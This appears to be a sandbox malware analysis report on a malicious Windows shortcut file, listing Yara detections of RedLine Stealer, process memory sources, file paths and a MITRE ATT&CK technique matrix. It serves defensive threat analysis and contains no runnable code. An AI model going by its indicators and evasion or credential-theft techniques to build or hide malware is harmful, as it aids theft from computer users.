Source: AutoIt3.exe, 0000001A.00000002.1910385229.0000000000D36000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 25.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000003.1833241977.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.1908914429.0000000004770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1674485682.0000000004508000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1834778236.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.1667401660.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.1908716949.0000000004970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1914811430.0000000003FC8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1840944996.00000000041B8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.1833497211.0000000004960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.1667521977.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: updater.exe PID: 8800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 8852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 9016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 9076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 9132, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: 25.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000003.1833241977.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.1908914429.0000000004770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1674485682.0000000004508000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1834778236.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.1667401660.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.1908716949.0000000004970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1914811430.0000000003FC8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1840944996.00000000041B8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.1833497211.0000000004960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.1667521977.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: updater.exe PID: 8800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 8852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 9016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 9076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 9132, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_0038696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	20_2_0038696E
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_00386E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	20_2_00386E32
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CF696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	22_2_00CF696E
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CF6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	22_2_00CF6E32

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 Create Account	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	2 Valid Accounts	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	1 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	169 System Information Discovery	Distributed Component Object Model	21 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	11 Masquerading	LSA Secrets	261 Security Software Discovery	SSH	3 Clipboard Data	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Registry Run Keys / Startup Folder	2 Valid Accounts	Cached Domain Credentials	251 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	251 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report sEOELQpFOB.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
sEOELQpFOB.lnk